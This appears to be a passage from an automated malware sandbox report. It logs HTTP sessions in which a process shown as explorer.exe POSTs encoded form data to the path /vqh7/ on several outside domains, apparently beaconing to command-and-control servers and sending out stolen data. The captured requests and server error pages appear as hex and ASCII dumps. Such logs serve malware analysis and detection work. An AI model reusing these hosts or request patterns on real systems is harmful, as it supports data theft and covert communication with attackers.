                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                              Feb 10, 2023 12:45:59.927386999 CET225INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                              Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              19192.168.2.34970291.195.240.11780C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:46:12.221292973 CET227OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.nativealternatives.com
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.nativealternatives.com
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.nativealternatives.com/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Raw: 75 31 75 61 3d 62 59 4e 63 64 36 31 51 74 4a 62 59 57 58 74 68 46 53 72 73 72 49 44 78 38 4c 62 75 35 56 73 73 31 55 72 4f 31 5f 73 4c 6f 72 36 2d 4a 48 79 66 53 71 57 6f 66 4d 62 43 6c 77 6c 7a 76 7a 56 62 66 74 6f 56 76 65 35 47 6e 2d 44 76 7e 50 6e 51 56 71 5a 4c 30 6f 6a 48 70 50 53 4d 39 67 72 70 62 69 6e 72 70 4f 63 38 43 58 7a 77 52 36 76 54 65 72 53 4f 75 68 6a 6c 70 63 62 6a 59 45 66 70 77 49 53 50 4b 4a 58 63 59 55 56 42 30 42 31 45 5a 64 45 4d 66 62 51 30 74 31 78 31 7a 4f 30 72 76 72 52 37 78 42 55 68 54 6b 58 6b 30 4e 50 35 77 67 29 2e 00 00 00 00 00 00 00 00
                                                              Data Ascii: u1ua=bYNcd61QtJbYWXthFSrsrIDx8Lbu5Vss1UrO1_sLor6-JHyfSqWofMbClwlzvzVbftoVve5Gn-Dv~PnQVqZL0ojHpPSM9grpbinrpOc8CXzwR6vTerSOuhjlpcbjYEfpwISPKJXcYUVB0B1EZdEMfbQ0t1x1zO0rvrR7xBUhTkXk0NP5wg).
                                                              Feb 10, 2023 12:46:12.240909100 CET227INHTTP/1.1 403 Forbidden
                                                              date: Fri, 10 Feb 2023 11:46:12 GMT
                                                              content-type: text/html
                                                              transfer-encoding: chunked
                                                              vary: Accept-Encoding
                                                              server: NginX
                                                              content-encoding: gzip
                                                              connection: close
                                                              Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              2192.168.2.349685199.192.22.19880C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:03.525937080 CET133OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.specigain.online
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.specigain.online
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.specigain.online/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Raw: 75 31 75 61 3d 67 33 42 74 5a 34 56 76 30 4a 31 36 30 53 58 48 71 36 56 6f 7e 46 4e 79 4d 55 30 4a 70 77 30 50 4e 6f 38 6a 4b 4c 6d 6a 47 6c 45 71 36 53 71 47 35 5a 4f 69 4e 6e 7e 50 56 38 79 74 39 63 64 4e 52 34 4d 45 44 46 35 59 77 6f 59 4e 72 6f 49 72 49 6b 65 45 67 62 49 54 42 70 78 6d 75 45 56 4b 4f 71 4e 63 4e 46 4b 42 50 58 31 73 54 6c 52 4e 79 51 66 77 42 51 64 38 38 35 56 5f 65 63 7a 36 47 56 65 71 77 35 66 74 61 6f 62 5f 66 48 45 74 4b 47 34 4e 74 6b 70 4f 30 7a 38 46 4d 62 58 59 56 6e 30 52 71 75 73 4f 44 5a 6a 41 75 4c 37 77 4c 64 67 5a 6e 44 33 79 59 75 41 74 39 48 47 67 72 37 69 49 46 52 7e 6e 59 37 6f 6a 4b 46 42 39 43 70 58 70 52 61 33 78 75 59 53 39 34 5a 4e 41 31 73 30 72 6e 52 73 74 67 53 43 6a 79 6a 52 55 43 5f 4f 70 30 72 4d 5a 56 67 46 56 59 2d 46 78 76 69 34 67 65 59 57 39 6c 30 4e 70 75 5f 41 35 4d 35 48 4d 6b 56 6b 62 48 78 4d 48 64 57 69 54 50 38 75 39 37 76 58 41 76 49 4d 51 69 49 54 61 58 61 45 2d 76 79 69 33 38 4c 34 47 4e 57 6a 45 78 41 56 54 64 64 33 79 71 73 66 31 45 52 78 50 62 6f 49 41 56 71 6b 59 4c 70 4a 56 32 32 68 77 45 73 77 73 45 50 38 77 72 4a 7e 58 38 69 6e 45 6e 73 69 69 64 6a 41 53 6d 68 59 58 35 51 55 43 51 48 43 38 45 48 47 53 59 5a 59 51 49 4b 6e 58 33 65 6c 61 59 42 68 50 41 67 73 6a 32 5f 4c 4a 5a 4d 31 72 52 62 34 4e 31 55 42 70 4f 47 65 58 59 62 46 51 41 4f 76 47 46 61 46 33 51 39 38 38 46 32 33 6c 6f 58 71 38 6c 41 4d 6a 44 42 64 53 73 44 67 6c 35 41 63 64 74 4f 7e 38 32 48 69 48 51 4e 6b 4c 53 47 73 56 53 33 65 53 64 68 53 4c 66 49 4e 36 68 6b 36 38 56 43 33 4b 6d 58 6a 5f 65 5f 70 36 39 47 30 2d 57 61 71 66 38 69 67 48 6c 47 62 38 28 71 31 6a 79 4d 55 4a 6e 44 4a 63 49 5a 62 70 4b 30 73 73 51 54 41 79 32 54 67 67 67 61 63 5a 71 4d 56 6f 51 6e 65 6c 49 64 57 42 35 44 77 6f 68 75 64 7a 5a 55 7a 79 7a 45 43 63 67 74 47 39 58 37 33 57 42 67 52 53 30 5a 67 42 45 41 71 6a 4c 5f 36 30 39 6a 71 75 51 48 6c 4a 73 31 45 58 6a 6e 7a 72 76 4c 79 6f 59 43 35 70 53 41 68 77 33 61 58 6c 33 68 74 57 28 42 34 45 4a 67 6b 31 61 41 45 73 6f 78 6e 6b 6a 6b 58 47 6f 61 48 41 31 52 4b 47 46 72 4f 46 38 48 32 65 38 6e 45 37 7e 46 47 61 42 54 58 4c 28 5a 56 4b 31 58 54 54 58 6d 79 39 42 51 41 6c 34 69 4c 4c 7e 55 73 65 67 42 44 71 58 41 67 68 62 2d 56 2d 43 4d 63 55 47 46 56 33 30 48 4b 6b 70 56 51 78 65 47 61 55 77 7a 47 42 34 4b 44 56 75 6a 50 7a 4f 79 45 79 41 42 6e 78 77 65 6a 45 58 39 54 6b 75 45 44 41 72 6f 33 2d 6f 76 63 5f 48 50 72 55 78 64 56 36 6d 57 58 41 50 47 4c 71 72 39 73 2d 4e 43 69 79 52 43 52 6c 44 78 43 57 73 74 75 42 64 59 77 52 42 46 6b 6e 41 49 77 6a 76 39 46 48 6e 5a 5a 56 58 76 56 76 75 33 6d 36 4a 34 57 6b 68 5f 66 5f 4d 36 39 78 6a 49 55 56 69 70 4b 4b 59 70 4d 79 51 4b 41 50 78 32 31 41 69 6e 76 70 6c 4e 43 44 68 4a 6b 54 6b 65 64 57 6a 36 75 73 52 64 33 71 7a 56 34 6a 42 30 46 68 36 35 45 57 4a 61 4a 53 63 52 77 4a 54 66 59 72 48 2d 4c 75 4d 6a 30 52 6d 58 30 6c 57 48 5a 55 33 33 75 31 61 59 4f 4f 35 5f 6e 41 32 64 56 63 33 45 4d 6a 43 68 64 77 34 39 72 57 31 41 4e 34 50 52 7a 44 42 39 66 57 57 52 34 6d 47 67 64 75 37 4b 38 54 6e 48 44 30 6e 36 5a 53 61 6b 31 70 4c 37 38 75 54 4b 66 45 43 62 44 58 72 54 38 4f 50 67 70 41 33 5a 50 46 77 56 43 57 4f 72 76 78 4d 58 6a 68 74 4a 34 5a 43 62 33 2d 33 71 6d 56 73 39 35 30 69 41 5a 54 39 55 35 42 50 66 71 62 72 51 4e 6c 46 73 66 42 64 66 56 76 52 49 33 30 50 65 44 35 33 4d 52 5f 4f 44 50 41 7a 73 77 6a 36 36 47 63 73 51 32 6e 4e 4e 73 36 50 61 64 35 62 38 61 54 57 58 64 59 62 62 44 64 78 69 7e 51 7e 72 47 70 32 58 4c 76 70 31 38 4d 32 38 67 45 31 62 58 4c 44 45 67 69 51 74 6e 59 74 6f 48 59 61 46 54 75 6a 70 5a 35 4d 30 38 73 4c 76 6a 6f 58 73 49 49 5a 79 4f 4e 35 37 48 42 72 50 72 72 76 46 4f 75 4e 6a 4e 71 37 50 6a 39 4d 47 77 34 79 6f 48 34 6f 41 62 43 6b 70 36 51 4d 73 70 4d 37 53 51 6c 63 71 6c 2d 31 6b 59 78 7e 71 30 4a 4a 77 6d 44 47 48 72 62 46 53 37 4e 6b 31 61 41 66 76 39 36 33 65 54 4d 50 4f 45 45 35 6a 66 35 67 72 33 6e 7a 52 69 55 68 37 76 69 28 45 72 43 78 71 56 70 68 56 4a 62 4f 56 4a 38 6c 63 52 72 55 48 56 78 47 66 30 57 34 30 45 66 37 54 6e 77 37 54 58 59 31 34 78 73 7a 79 55 48 6a 67 5a 6e 75 42
                                                              Data Ascii: u1ua=g3BtZ4Vv0J160SXHq6Vo~FNyMU0Jpw0PNo8jKLmjGlEq6SqG5ZOiNn~PV8yt9cdNR4MEDF5YwoYNroIrIkeEgbITBpxmuEVKOqNcNFKBPX1sTlRNyQfwBQd885V_ecz6GVeqw5ftaob_fHEtKG4NtkpO0z8FMbXYVn0RqusODZjAuL7wLdgZnD3yYuAt9HGgr7iIFR~nY7ojKFB9CpXpRa3xuYS94ZNA1s0rnRstgSCjyjRUC_Op0rMZVgFVY-Fxvi4geYW9l0Npu_A5M5HMkVkbHxMHdWiTP8u97vXAvIMQiITaXaE-vyi38L4GNWjExAVTdd3yqsf1ERxPboIAVqkYLpJV22hwEswsEP8wrJ~X8inEnsiidjASmhYX5QUCQHC8EHGSYZYQIKnX3elaYBhPAgsj2_LJZM1rRb4N1UBpOGeXYbFQAOvGFaF3Q988F23loXq8lAMjDBdSsDgl5AcdtO~82HiHQNkLSGsVS3eSdhSLfIN6hk68VC3KmXj_e_p69G0-Waqf8igHlGb8(q1jyMUJnDJcIZbpK0ssQTAy2TgggacZqMVoQnelIdWB5DwohudzZUzyzECcgtG9X73WBgRS0ZgBEAqjL_609jquQHlJs1EXjnzrvLyoYC5pSAhw3aXl3htW(B4EJgk1aAEsoxnkjkXGoaHA1RKGFrOF8H2e8nE7~FGaBTXL(ZVK1XTTXmy9BQAl4iLL~UsegBDqXAghb-V-CMcUGFV30HKkpVQxeGaUwzGB4KDVujPzOyEyABnxwejEX9TkuEDAro3-ovc_HPrUxdV6mWXAPGLqr9s-NCiyRCRlDxCWstuBdYwRBFknAIwjv9FHnZZVXvVvu3m6J4Wkh_f_M69xjIUVipKKYpMyQKAPx21AinvplNCDhJkTkedWj6usRd3qzV4jB0Fh65EWJaJScRwJTfYrH-LuMj0RmX0lWHZU33u1aYOO5_nA2dVc3EMjChdw49rW1AN4PRzDB9fWWR4mGgdu7K8TnHD0n6ZSak1pL78uTKfECbDXrT8OPgpA3ZPFwVCWOrvxMXjhtJ4ZCb3-3qmVs950iAZT9U5BPfqbrQNlFsfBdfVvRI30PeD53MR_ODPAzswj66GcsQ2nNNs6Pad5b8aTWXdYbbDdxi~Q~rGp2XLvp18M28gE1bXLDEgiQtnYtoHYaFTujpZ5M08sLvjoXsIIZyON57HBrPrrvFOuNjNq7Pj9MGw4yoH4oAbCkp6QMspM7SQlcql-1kYx~q0JJwmDGHrbFS7Nk1aAfv963eTMPOEE5jf5gr3nzRiUh7vi(ErCxqVphVJbOVJ8lcRrUHVxGf0W40Ef7Tnw7TXY14xszyUHjgZnuBhdN5DhMzB2Hgnr2YWe5EjLvprV45NidN6Z70yO2YhzpoGFa8QmWM91HGi8X6BRL7k9~vmK8KGzR6h3bADItXDPY5rbg5yGdDWnfaj7EjY5nfNdK0d2XDZ4V7B1UKfdvDnygGaQUykTd8NLIwA1yihYotw607KuDkbYzYHAA7mjtvtmknDWG3De0ghAw47PltE7VAqjcxAUESWowVo_wgz03sgA4Bvu(VwOoVM_EJGt9_qhWCI61mlT5GWHv2U2VqhxrsIa8ml9r2vWYLqI2YfBoYZZtOfxZgWB2MGie4T4o5J1bZiRzHJRoE54pWqRZmoVhia87st5dRmi(35laSK5XYBJe0CPiYr2cMLSYblQtV6iqEJm01WT9yCqJo2lan5d921DRfC6(PAP9ADb3d58eajm~3pIFsajAk8FW7Jq(rPdQWWbi9dnAaXlWpcZktJ1pMQC(7t7bnG87yTXeJkvVXXXnFV5owWx7kMeodbo7KISNhzsHL7C6kZhuyBmFL05kDaMcOjWpCIKwizbAAF5fvvLOFMakwDcpvwkXk~7LVLvwEEbZZgSp50SNW6rpTHtxYcxCgUttlzcyCAnILI0glRGGY0ZV2U2GOypu9GlbHjnC4DakRH9(NFBt1X5r4SfJwTNvrd8uxAX2uFggO7PLkxtCGtEfmrwKEzYKddqWuApoGjVrqF6fmPqwuJqq5f4RNQzoCN6c0YxZMDa7KTiHG54O3MMy0cc7cloPDi9z4nDa9Mzk9~WmAGbmCGcGKH12ZoDCGV_C7s505GuNbvuriaJXbMXf2WVfmROrVhL8HOeJptCrCGnc4p4ydxnwl7fZ52n8_p8lc(UWs9knXm4g2VOj5z10fXjhoYSh_iyzIv1BnMChJxseg8CqczwPtsqV8ZTpOfMTN6J5MbhMU8Ym1t8Q3X95wjTT6knh0HkVaI9FiCNLXXIMxZ4LJxk~uVrLx34yD11a6TLLKHmAwk4Xu(-aZ0bNmxwpkt368PQEbHy0hJr21ASS1VxuAfimgTaxCWrHrujM_fd542o33t4JQ100KE9Gf5Fp4P95X7ef7uT9AXwnvclueQWVpdNZuFOaBJ6Om9-JjPcaSSKnH1ghs1tFfgau0vFWbccuak_yqfNVS0kZ1DkJ_UwdCx2RDPN29OWWwwctAhkPh4-B5Z322XoVQODxOmV7sD5ATx2YiCxhcDjfKEa6H5zTmQ6qX73(3UeuY7rCVuEEWM4HVaAuVc-15kX8yFcXAsNUJfBZD9NhKqi6RW7rcZNsy1ye9fKmZOeNem3wGViy-CPRcPfQeBfK65kL5wuaOqvaCdjgmzXeZKOtrHwDlnboD(U8atPHklSekwavOXLcOdxdKq8zMUKBvcJDFArJLj0~3LiCbnpZ9lJ0bchqBV4hGsAndwOPhuAfIUrlcjVgIYLPWE_Oi2JNfoNG8Ffi6cNAoMU9N1cKqJ-EowaQ44VhVh83exWU1Z4Pbl3eaaNjpOL8Y54Kwj9X_mIr22sWO59BwqHBIUtuGl6(tFIm7DTY3KEz1v9lwTD2sp4NtxB4BsD5Lotn2G5aIHw15mDjLjQazXVo5wQZ3nyzZizgyT41_fPqsbF(k3zFY0LAh22JTRV64RvMW23DF14YakNIxFOEmUdeJF-dCIoZpKeW25-4Fj5pIrNFRno1_Dars0uLMJpjVRuJgOoywoFzvyUyop-oMyyJIWe7zzUhm8YYpTqp_lrHsMTYoRwwnx6D2(p9-~6WsUfFD7-zLXo8Gc8RqoYBrblR6rnzAd1tXT0uXqkM2ZTeVHoq5R1v7JNhB9ixJLaXovGDjwf06(VXuVeXCCKyOnEYK7yRZiyRxcw6q42S76itprNiTw70_r7TnrXnWojrSylaXELD4Lx3lbknr4Esqfiyp(4CLl3K-yz8q(ud6DYfcKYq54WT1PSo4AjBui4ahjuU_ftNwzrgzVrtWwJDJlpeulcPqYWN7YF6TinuqEjH8gTqRBVn5HMGlIcu0IhXaLTm-EmVDa-jg46QpieEjsifv9YvOpiOS8hpvkY(X~Hf-bMU7z4ibulxLyfP3PTJJUvzIIVoiQPt1dcAlcny1I_1oWhj8UOWd3b(fF8mTiwiKfLV6XMcsG5jjoxUVuEBUEMwyod4R3t09svMpaKxaCDMZFurGN18AyVD5ICtqphotdtsL5Kb1NTyCpxL7USRFk7aU4CYF(MUXy-22BaBkgIkXufyfYpgKtqQMtZuf5O5wsKy0DvulVx99MvneKZbg9P5LBr3pnOoz1P5cdOonwdrOaFkwx8FItCGMG60CQsN9uj~C(xMzu90aoHQWDPT_wQ4RxK896py_rRi4pybOrJcU5IOuLpwNuazz~l(NQmsEAPid97ieayD1ODSXk4Tnx_0w9A7hZAkMchtHqdLbMkOxOISa4PaLqq4yXpwVHuAd97AXyMkkX37Uz_hTBdp1fA0HMQ9y42YS8qr3yK7U2bx5R8ia17MBZlk6vmSTZCmf1BHM2aF_ifxOJbAAiUqjpHh0gPpjLc9E6M5dWct10CEqiCwDuEIsVE0UJYmH3fSTyE(WMvT-fIZxJxBJE-iFDRnqalQZllq57cewChjDYD34qwwiFEMSHWlTaBBeW7vA(XQb5fMgpIli8Wh-AH~TX66P59qUFmBgWsBpAX8hbtuJRLwjygvEecpqPLuvUsCj6oEKtxjXpQiWD2m8SBlahfWjMCHfUpFPy7s
                                                              Feb 10, 2023 12:45:03.893599033 CET134INHTTP/1.1 404 Not Found
                                                              Date: Fri, 10 Feb 2023 11:45:03 GMT
                                                              Server: Apache
                                                              Content-Length: 570
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              20192.168.2.34970391.195.240.11780C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:46:24.649605036 CET233OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.nativealternatives.com
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.nativealternatives.com
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.nativealternatives.com/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Raw: 75 31 75 61 3d 62 59 4e 63 64 36 31 51 74 4a 62 59 57 7a 52 68 44 7a 72 73 38 34 44 2d 69 62 62 75 79 31 73 6f 31 55 6e 4f 31 36 55 39 6f 34 57 2d 4b 51 7e 66 53 49 7e 6f 53 73 62 43 6a 77 6c 5f 72 7a 55 43 66 74 73 5f 76 63 78 4a 6e 39 76 76 34 64 66 51 58 4b 5a 4d 72 34 6a 47 71 50 53 4c 69 51 72 70 62 69 37 5a 70 4c 78 42 43 58 4c 77 52 4a 6e 54 65 6f 36 4e 68 52 6a 6b 32 4d 62 6a 59 45 54 69 77 49 54 36 4b 4b 6d 42 59 56 31 42 75 33 35 45 56 73 45 54 62 4c 51 7a 75 31 77 78 79 73 74 56 37 4c 56 51 79 48 74 63 5a 52 79 55 7e 76 4b 6f 7a 2d 54 4b 7e 61 5a 35 6a 69 4b 7a 28 37 54 73 78 46 41 4e 64 32 34 62 37 65 66 36 70 46 36 35 31 4a 45 78 69 42 6d 53 4a 4e 30 4f 53 52 74 37 31 6f 6d 7a 4c 79 50 66 4b 41 68 37 30 46 31 75 39 70 43 51 59 50 54 57 43 78 51 67 6c 73 63 79 44 64 55 75 55 70 63 37 4b 70 54 57 58 51 35 67 46 46 43 68 34 32 37 41 66 4d 67 53 68 41 7e 33 69 56 73 64 6d 35 45 4a 61 50 73 74 74 41 77 41 69 4e 53 39 7e 4d 45 44 49 74 61 42 4e 7a 4a 52 73 49 6b 37 62 55 39 57 74 6c 55 4d 45 45 66 59 56 50 51 75 57 36 44 53 68 74 48 7a 74 79 6d 57 6a 57 48 47 38 7a 64 41 6b 4e 71 65 32 6a 7a 69 66 2d 75 4d 75 77 78 5a 37 44 4b 33 4c 42 4d 6a 41 46 28 67 38 67 4c 6f 47 